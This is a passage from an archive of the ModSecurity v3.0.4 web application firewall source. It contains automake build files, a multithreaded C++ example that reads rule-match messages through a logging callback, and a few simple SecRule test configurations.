$(SSDEEP_LDADD) \ $(YAJL_LDADD) simple_request_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(LMDB_LDFLAGS) \ -lpthread \ $(LUA_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(YAJL_LDFLAGS) simple_request_CPPFLAGS = \ $(GLOBAL_CFLAGS) \ -std=c++11 \ -I$(top_builddir)/headers \ -I$(top_builddir) \ -g \ -I../others \ -fPIC \ -O3 \ $(GEOIP_CFLAGS) \ $(GLOBAL_CPPFLAGS) \ $(MODSEC_NO_LOGS) \ $(YAJL_CFLAGS) \ $(LMDB_CFLAGS) \ $(LUA_CFLAGS) \ $(PCRE_CFLAGS) \ $(LIBXML2_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in all: all-am .SUFFIXES: .SUFFIXES: .cc .lo .o .obj $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign examples/reading_logs_via_rule_message/Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign examples/reading_logs_via_rule_message/Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \ *) \ echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(am__aclocal_m4_deps): clean-noinstPROGRAMS: @list='$(noinst_PROGRAMS)'; test -n "$$list" || exit 0; \ echo " rm -f" $$list; \ rm -f $$list || exit $$?; \ test -n "$(EXEEXT)" || exit 0; \ list=`for p in $$list; do echo "$$p"; done | sed 's/$(EXEEXT)$$//'`; \ echo " rm -f" $$list; \ rm -f $$list simple_request$(EXEEXT): $(simple_request_OBJECTS) $(simple_request_DEPENDENCIES) $(EXTRA_simple_request_DEPENDENCIES) @rm -f simple_request$(EXEEXT) $(AM_V_CXXLD)$(simple_request_LINK) $(simple_request_OBJECTS) $(simple_request_LDADD) $(LIBS) mostlyclean-compile: -rm -f *.$(OBJEXT) distclean-compile: -rm -f *.tab.c @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/simple_request-simple_request.Po@am__quote@ # am--include-marker $(am__depfiles_remade): @$(MKDIR_P) $(@D) @echo '# dummy' >$@-t && $(am__mv) $@-t $@ am--depfiles: $(am__depfiles_remade) .cc.o: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.o$$||'`;\ @am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXXCOMPILE) -c -o $@ $< .cc.obj: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.obj$$||'`;\ @am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ `$(CYGPATH_W) '$<'` &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXXCOMPILE) -c -o $@ `$(CYGPATH_W) '$<'` .cc.lo: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.lo$$||'`;\ @am__fastdepCXX_TRUE@ $(LTCXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Plo @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=yes @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(LTCXXCOMPILE) -c -o $@ $< simple_request-simple_request.o: simple_request.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(simple_request_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT simple_request-simple_request.o -MD -MP -MF $(DEPDIR)/simple_request-simple_request.Tpo -c -o simple_request-simple_request.o `test -f 'simple_request.cc' || echo '$(srcdir)/'`simple_request.cc @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/simple_request-simple_request.Tpo $(DEPDIR)/simple_request-simple_request.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='simple_request.cc' object='simple_request-simple_request.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(simple_request_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o simple_request-simple_request.o `test -f 'simple_request.cc' || echo '$(srcdir)/'`simple_request.cc simple_request-simple_request.obj: simple_request.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(simple_request_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT simple_request-simple_request.obj -MD -MP -MF $(DEPDIR)/simple_request-simple_request.Tpo -c -o simple_request-simple_request.obj `if test -f 'simple_request.cc'; then $(CYGPATH_W) 'simple_request.cc'; else $(CYGPATH_W) '$(srcdir)/simple_request.cc'; fi` @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/simple_request-simple_request.Tpo $(DEPDIR)/simple_request-simple_request.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='simple_request.cc' object='simple_request-simple_request.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(simple_request_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o simple_request-simple_request.obj `if test -f 'simple_request.cc'; then $(CYGPATH_W) 'simple_request.cc'; else $(CYGPATH_W) '$(srcdir)/simple_request.cc'; fi` mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs ID: $(am__tagged_files) $(am__define_uniq_tagged_files); mkid -fID $$unique tags: tags-am TAGS: tags tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) set x; \ here=`pwd`; \ $(am__define_uniq_tagged_files); \ shift; \ if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ if test $$# -gt 0; then \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ "$$@" $$unique; \ else \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ $$unique; \ fi; \ fi ctags: ctags-am CTAGS: ctags ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) $(am__define_uniq_tagged_files); \ test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ && $(am__cd) $(top_srcdir) \ && gtags -i $(GTAGS_ARGS) "$$here" cscopelist: cscopelist-am cscopelist-am: $(am__tagged_files) list='$(am__tagged_files)'; \ case "$(srcdir)" in \ [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \ *) sdir=$(subdir)/$(srcdir) ;; \ esac; \ for i in $$list; do \ if test -f "$$i"; then \ echo "$(subdir)/$$i"; \ else \ echo "$$sdir/$$i"; \ fi; \ done >> $(top_builddir)/cscope.files distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done check-am: all-am check: check-am all-am: Makefile $(PROGRAMS) installdirs: install: install-am install-exec: install-exec-am install-data: install-data-am uninstall: uninstall-am install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-am install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-am clean-am: clean-generic clean-libtool clean-noinstPROGRAMS \ mostlyclean-am distclean: distclean-am -rm -f ./$(DEPDIR)/simple_request-simple_request.Po -rm -f Makefile distclean-am: clean-am distclean-compile distclean-generic \ distclean-tags dvi: dvi-am dvi-am: html: html-am html-am: info: info-am info-am: install-data-am: install-dvi: install-dvi-am install-dvi-am: install-exec-am: install-html: install-html-am install-html-am: install-info: install-info-am install-info-am: install-man: install-pdf: install-pdf-am install-pdf-am: install-ps: install-ps-am install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-am -rm -f ./$(DEPDIR)/simple_request-simple_request.Po -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-am mostlyclean-am: mostlyclean-compile mostlyclean-generic \ mostlyclean-libtool pdf: pdf-am pdf-am: ps: ps-am ps-am: uninstall-am: .MAKE: install-am install-strip .PHONY: CTAGS GTAGS TAGS all all-am am--depfiles check check-am clean \ clean-generic clean-libtool clean-noinstPROGRAMS cscopelist-am \ ctags ctags-am distclean distclean-compile distclean-generic \ distclean-libtool distclean-tags distdir dvi dvi-am html \ html-am info info-am install install-am install-data \ install-data-am install-dvi install-dvi-am install-exec \ install-exec-am install-html install-html-am install-info \ install-info-am install-man install-pdf install-pdf-am \ install-ps install-ps-am install-strip installcheck \ installcheck-am installdirs maintainer-clean \ maintainer-clean-generic mostlyclean mostlyclean-compile \ mostlyclean-generic mostlyclean-libtool pdf pdf-am ps ps-am \ tags tags-am uninstall uninstall-am .PRECIOUS: Makefile # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/examples/reading_logs_via_rule_message/simple_request.cc0000644000175000017500000000216513607066010027725 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #include #include #include #include #include "examples/reading_logs_via_rule_message/reading_logs_via_rule_message.h" int main(int argc, char **argv) { if (argc < 2) { std::cout << "Use " << *argv << " test-case-file.conf"; std::cout << std::endl << std::endl; return -1; } *(argv++); std::string rules(*argv); ReadingLogsViaRuleMessage rlvrm(request_header, request_uri, request_body, response_headers, response_body, ip, rules); rlvrm.process(); pthread_exit(NULL); return 0; } modsecurity-v3.0.4/examples/reading_logs_via_rule_message/reading_logs_via_rule_message.h0000644000175000017500000001527013607066010032556 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #include #include #include #define NUM_THREADS 100 char request_header[] = "" \ "GET /tutorials/other/top-20-mysql-best-practices/ HTTP/1.1\n\r" \ "Host: net.tutsplus.com\n\r" \ "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5)" \ " Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)\n\r" \ "Accept: text/html,application/xhtml+xml,application/xml; " \ "q=0.9,*/*;q=0.8\n\r" \ "Accept-Language: en-us,en;q=0.5\n\r" \ "Accept-Encoding: gzip,deflate\n\r" \ "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n\r" \ "Keep-Alive: 300\n\r" \ "Connection: keep-alive\n\r" \ "Cookie: PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120\n\r" \ "Pragma: no-cache\n\r" \ "Cache-Control: no-cache\n\r"; char request_uri[] = "/test.pl?param1=test¶2=test2"; char request_body[] = ""; char response_headers[] = "" \ "HTTP/1.1 200 OK\n\r" \ "Content-Type: text/xml; charset=utf-8\n\r" \ "Content-Length: length\n\r"; char response_body[] = "" \ "\n\r" \ "\n\r" \ " \n\r" \ " \n\r" \ " string\n\r" \ " \n\r" \ " \n\r" \ "\n\r"; char ip[] = "200.249.12.31"; #include "modsecurity/rule_message.h" #ifndef EXAMPLES_READING_LOGS_VIA_RULE_MESSAGE_READING_LOGS_VIA_RULE_MESSAGE_H_ #define EXAMPLES_READING_LOGS_VIA_RULE_MESSAGE_READING_LOGS_VIA_RULE_MESSAGE_H_ struct data_ms { modsecurity::ModSecurity *modsec; modsecurity::Rules *rules; }; static void *process_request(void *data) { struct data_ms *a = (struct data_ms *)data; modsecurity::ModSecurity *modsec = a->modsec; modsecurity::Rules *rules = a->rules; int z = 0; for (z = 0; z < 10000; z++) { modsecurity::Transaction *modsecTransaction = \ new modsecurity::Transaction(modsec, rules, NULL); modsecTransaction->processConnection(ip, 12345, "127.0.0.1", 80); modsecTransaction->processURI(request_uri, "GET", "1.1"); usleep(10); modsecTransaction->addRequestHeader("Host", "net.tutsplus.com"); modsecTransaction->processRequestHeaders(); modsecTransaction->processRequestBody(); modsecTransaction->addResponseHeader("HTTP/1.1", "200 OK"); modsecTransaction->processResponseHeaders(200, "HTTP 1.2"); modsecTransaction->appendResponseBody( (const unsigned char*)response_body, strlen((const char*)response_body)); modsecTransaction->processResponseBody(); modsecTransaction->processLogging(); delete modsecTransaction; } pthread_exit(NULL); return NULL; } class ReadingLogsViaRuleMessage { public: ReadingLogsViaRuleMessage(char *request_header, char *request_uri, char *request_body, char *response_headers, char *response_body, char *ip, std::string rules) : m_request_header(request_header), m_request_uri(request_uri), m_request_body(request_body), m_response_headers(response_headers), m_response_body(response_body), m_ip(ip), m_rules(rules) { } int process() { pthread_t threads[NUM_THREADS]; int i; struct data_ms dms; void *status; modsecurity::ModSecurity *modsec; modsecurity::Rules *rules; modsecurity::ModSecurityIntervention it; modsec = new modsecurity::ModSecurity(); modsec->setConnectorInformation("ModSecurity-test v0.0.1-alpha" \ " (ModSecurity test)"); modsec->setServerLogCb(logCb, modsecurity::RuleMessageLogProperty | modsecurity::IncludeFullHighlightLogProperty); rules = new modsecurity::Rules(); if (rules->loadFromUri(m_rules.c_str()) < 0) { std::cout << "Problems loading the rules..." << std::endl; std::cout << rules->m_parserError.str() << std::endl; return -1; } dms.modsec = modsec; dms.rules = rules; for (i = 0; i < NUM_THREADS; i++) { pthread_create(&threads[i], NULL, process_request, reinterpret_cast(&dms)); // process_request((void *)&dms); } usleep(10000); for (i=0; i < NUM_THREADS; i++) { pthread_join(threads[i], &status); std::cout << "Main: completed thread id :" << i << std::endl; } delete rules; delete modsec; pthread_exit(NULL); return 0; end: return -1; } static void logCb(void *data, const void *ruleMessagev) { if (ruleMessagev == NULL) { std::cout << "I've got a call but the message was null ;("; std::cout << std::endl; return; } const modsecurity::RuleMessage *ruleMessage = \ reinterpret_cast(ruleMessagev); std::cout << "Rule Id: " << std::to_string(ruleMessage->m_ruleId); std::cout << " phase: " << std::to_string(ruleMessage->m_phase); std::cout << std::endl; if (ruleMessage->m_isDisruptive) { std::cout << " * Disruptive action: "; std::cout << modsecurity::RuleMessage::log(ruleMessage); std::cout << std::endl; std::cout << " ** %d is meant to be informed by the webserver."; std::cout << std::endl; } else { std::cout << " * Match, but no disruptive action: "; std::cout << modsecurity::RuleMessage::log(ruleMessage); std::cout << std::endl; } } protected: char *m_request_header; char *m_request_uri; char *m_request_body; char *m_response_headers; char *m_response_body; char *m_ip; std::string m_rules; }; #endif // EXAMPLES_READING_LOGS_VIA_RULE_MESSAGE_READING_LOGS_VIA_RULE_MESSAGE_H_ modsecurity-v3.0.4/examples/reading_logs_via_rule_message/no_match.conf0000644000175000017500000000012713607066010027010 0ustar zimmerlezimmerleSecRule ARGS:param1 "WHEEE" "id:1,phase:2,deny,msg:'this',msg:'is',msg:'a',msg:'test'" modsecurity-v3.0.4/examples/reading_logs_via_rule_message/match.conf0000644000175000017500000000011613607066010026312 0ustar zimmerlezimmerleSecRule ARGS:param1 "test" "id:1,deny,msg:'this',msg:'is',msg:'a',msg:'test'" modsecurity-v3.0.4/examples/reading_logs_via_rule_message/blocked_request_engine_on.conf0000644000175000017500000000007013607066010032411 0ustar zimmerlezimmerleSecRuleEngine On SecRule ARGS:param1 "test" "id:1,deny" modsecurity-v3.0.4/examples/reading_logs_via_rule_message/blocked_request.conf0000644000175000017500000000014213607066010030370 0ustar zimmerlezimmerleSecRule ARGS:param1 "test" "id:1,deny,phase:2,chain,msg:'test'" SecRule ARGS:param1 "test" "log" modsecurity-v3.0.4/examples/reading_logs_via_rule_message/Makefile.am0000644000175000017500000000150213607066010026403 0ustar zimmerlezimmerle noinst_PROGRAMS = simple_request simple_request_SOURCES = \ simple_request.cc simple_request_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(MAXMIND_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ $(SSDEEP_LDADD) \ $(YAJL_LDADD) simple_request_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(LMDB_LDFLAGS) \ -lpthread \ $(LUA_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(YAJL_LDFLAGS) simple_request_CPPFLAGS = \ $(GLOBAL_CFLAGS) \ -std=c++11 \ -I$(top_builddir)/headers \ -I$(top_builddir) \ -g \ -I../others \ -fPIC \ -O3 \ $(GEOIP_CFLAGS) \ $(GLOBAL_CPPFLAGS) \ $(MODSEC_NO_LOGS) \ $(YAJL_CFLAGS) \ $(LMDB_CFLAGS) \ $(LUA_CFLAGS) \ $(PCRE_CFLAGS) \ $(LIBXML2_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in modsecurity-v3.0.4/examples/multiprocess_c/0000755000175000017500000000000013607066346021371 5ustar zimmerlezimmerlemodsecurity-v3.0.4/examples/multiprocess_c/Makefile.in0000644000175000017500000005727613607066346023457 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ noinst_PROGRAMS = multi$(EXEEXT) subdir = examples/multiprocess_c ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/build/ax_prog_doxygen.m4 \ $(top_srcdir)/build/ax_valgrind_check.m4 \ $(top_srcdir)/build/curl.m4 $(top_srcdir)/build/libgeoip.m4 \ $(top_srcdir)/build/libmaxmind.m4 \ $(top_srcdir)/build/libtool.m4 $(top_srcdir)/build/libxml.m4 \ $(top_srcdir)/build/lmdb.m4 $(top_srcdir)/build/ltoptions.m4 \ $(top_srcdir)/build/ltsugar.m4 \ $(top_srcdir)/build/ltversion.m4 \ $(top_srcdir)/build/lt~obsolete.m4 $(top_srcdir)/build/lua.m4 \ $(top_srcdir)/build/pcre.m4 $(top_srcdir)/build/ssdeep.m4 \ $(top_srcdir)/build/yajl.m4 $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ $(ACLOCAL_M4) DIST_COMMON = $(srcdir)/Makefile.am $(am__DIST_COMMON) mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = CONFIG_CLEAN_VPATH_FILES = PROGRAMS = $(noinst_PROGRAMS) am_multi_OBJECTS = multi-multi.$(OBJEXT) multi_OBJECTS = $(am_multi_OBJECTS) am__DEPENDENCIES_1 = multi_DEPENDENCIES = $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) \ $(am__DEPENDENCIES_1) $(am__DEPENDENCIES_1) AM_V_lt = $(am__v_lt_@AM_V@) am__v_lt_ = $(am__v_lt_@AM_DEFAULT_V@) am__v_lt_0 = --silent am__v_lt_1 = multi_LINK = $(LIBTOOL) $(AM_V_lt) --tag=CC $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CCLD) $(multi_CFLAGS) $(CFLAGS) \ $(multi_LDFLAGS) $(LDFLAGS) -o $@ AM_V_P = $(am__v_P_@AM_V@) am__v_P_ = $(am__v_P_@AM_DEFAULT_V@) am__v_P_0 = false am__v_P_1 = : AM_V_GEN = $(am__v_GEN_@AM_V@) am__v_GEN_ = $(am__v_GEN_@AM_DEFAULT_V@) am__v_GEN_0 = @echo " GEN " $@; am__v_GEN_1 = AM_V_at = $(am__v_at_@AM_V@) am__v_at_ = $(am__v_at_@AM_DEFAULT_V@) am__v_at_0 = @ am__v_at_1 = DEFAULT_INCLUDES = -I.@am__isrc@ -I$(top_builddir)/src depcomp = $(SHELL) $(top_srcdir)/depcomp am__maybe_remake_depfiles = depfiles am__depfiles_remade = ./$(DEPDIR)/multi-multi.Po am__mv = mv -f COMPILE = $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) \ $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) LTCOMPILE = $(LIBTOOL) $(AM_V_lt) --tag=CC $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=compile $(CC) $(DEFS) \ $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) \ $(AM_CFLAGS) $(CFLAGS) AM_V_CC = $(am__v_CC_@AM_V@) am__v_CC_ = $(am__v_CC_@AM_DEFAULT_V@) am__v_CC_0 = @echo " CC " $@; am__v_CC_1 = CCLD = $(CC) LINK = $(LIBTOOL) $(AM_V_lt) --tag=CC $(AM_LIBTOOLFLAGS) \ $(LIBTOOLFLAGS) --mode=link $(CCLD) $(AM_CFLAGS) $(CFLAGS) \ $(AM_LDFLAGS) $(LDFLAGS) -o $@ AM_V_CCLD = $(am__v_CCLD_@AM_V@) am__v_CCLD_ = $(am__v_CCLD_@AM_DEFAULT_V@) am__v_CCLD_0 = @echo " CCLD " $@; am__v_CCLD_1 = SOURCES = $(multi_SOURCES) DIST_SOURCES = $(multi_SOURCES) am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ 